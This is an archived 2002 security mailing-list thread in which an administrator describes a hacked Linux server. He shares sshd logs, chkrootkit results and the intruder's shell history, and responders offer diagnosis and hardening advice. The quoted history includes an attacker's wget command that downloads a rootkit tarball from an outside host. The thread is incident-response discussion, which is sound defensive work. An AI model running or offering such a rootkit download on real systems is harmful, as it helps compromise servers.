hi ya ver

On Wed, 11 Sep 2002, Ver Allan Sumabat wrote:

> we used linux 2.4.7-10. we only opened ports 21 (ftp),
> 22 (ssh), and 443 (https).
>
> 21 - wu-ftpd-2.6.1-20
> 22 - openssh-3.1
> 443 - tomcat-3.2.4

what does nmap say is also open ports to the outside
and to the inside your corp lan ??
 
> 1. this is the content of /home/war's .bash_history:
>
> wget
> wget http://mrunix.free.fr/roy/w00tkit.tgz
> logout

game over... they are already in your server ...

        - they probably got in thru wu-ftpd and/or openssh
        ( check the respective websites for the current
        ( versions you should have been running

- you should NOT have been running 2.4.7-10 kernels...
        you should always compile your own kernel
        and apply your own kernel hardening apps

they were trying to get more rootkits installed ( wootkit )

 
> 2. he was trying to send a mail to himself regarding
> the system's resources:
>
> The original message was received at Thu, 5 Sep 2002
> 22:21:37 +0800
> from rootlocalhost
>
> ----- The following addresses had permanent fatal
> errors -----
> roi_blablawalla.co.il
> (reason: 501 5.1.8 Sender domain must exist)

seems really really odd that the [h/cr]acker would
send themself an email to a domain that does nto exists
or to reject it... must be another hacked box they
are playing with ??

- more server hardening/tightening stuff
        http://www.Linux-Sec.net

c ya
alvin

>
> ----- Transcript of session follows -----
> ... while talking to rmail.walla.co.il.:
> >>> MAIL From:<rootsrv1.iconnect.com.ph> SIZE=2283
> <<< 501 5.1.8 Sender domain must exist
> 501 5.6.0 Data format error
>
> 3. walla.co.il is in israel
>
> 4. tracing 212.179.207.211 gives israel also.
>
> i have moved the files to another machine and
> reinstalled the server 'cause we need to put it up and
> running asap. do u think the exploit was done thru
> ftp? can u help me replicate it? i was looking for
> procedures or scripts in ssh/ftp exploits so that i
> can try to attack our server but i can not find any.
>
> --- Loki <lokifatelabs.com> wrote:
> > What version of SSHD were you running, check
> > commonly exploited
> > services.
> >
> > 1. SSHD (crc32)
> > 2. FTPD
> > 3. Apache (chunking)
> >
> > Get back to us with the versions you were running of
> > SSH, FTP, and
> > Apache and we can help you out. How hardened was the
> > OS? Did you turn
> > off all RPC services, etc. We need more info.
> >
> > Eric/Loki
> > Internet Warfare and Intelligence
> > Fate Research Labs
> > www.fatelabs.com
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > -----Original Message-----
> > From: Ver Allan Sumabat [mailto:ver_allanyahoo.com]
> >
> > Sent: Tuesday, September 10, 2002 6:08 AM
> > To: incidentssecurityfocus.com
> > Subject: possible ssh hack
> >
> >
> > Hi,
> >
> > We have just recently been hacked. I have no idea
> > how
> > he came in. Here are my preliminary investigations:
> >
> > 1. He was able to add a user without logging in.
> >
> > **Unmatched Entries**
> > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse
> > map address 10.13.41.4.
> > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password
> > for root from 10.13.41.4
> > port 4207
> > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse
> > map address 10.13.41.4.
> > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password
> > for root from 10.13.41.4
> > port 2491
> > Sep 5 22:16:59 srv1 useradd[23532]: new group:
> > name=war, gid=502
> > Sep 5 22:16:59 srv1 useradd[23532]: new user:
> > name=war, uid=502, gid=502,
> > home=/home/war, shell=/bin/bash
> > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password
> > for war from
> > 212.179.207.211 port 2746
> > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from
> > socket failed: Connection
> > reset by peer
> > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP;
> > restarting.
> >
> >
> > 2. He installed a tarball w00tkit.tgz in /home/war
> >
> > 3. After running chkrootkit, the significant lines
> > are:
> >
> > ...
> > Checking `ifconfig'... INFECTED
> > ...
> > Searching for Showtee... Warning: Possible Showtee
> > Rootkit installed
> > ...
> > Checking `lkm'... You have 1 process hidden for
> > ps
> > command
> > Warning: Possible LKM Trojan installed
> >
> > 4. ssh won't run anymore
> >
> > Can anyone help me on how the intrusion was done?
> >
> > Thanks.
> >
> > Regards,
> >
> > Allan
> >
> > __________________________________________________
> > Yahoo! - We Remember
> > 9-11: A tribute to the more than 3,000 lives lost
> > http://dir.remember.yahoo.com/tribute
> >
> >
> ------------------------------------------------------------------------
> > ----
> > This list is provided by the SecurityFocus ARIS
> > analyzer service. For
> > more information on this free incident handling,
> > management
> > and tracking system please see:
> > http://aris.securityfocus.com
> >
> >
> >
> ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus ARIS
> > analyzer service.
> > For more information on this free incident handling,
> > management
> > and tracking system please see:
> > http://aris.securityfocus.com
> >
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! News - Today's headlines
> http://news.yahoo.com
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]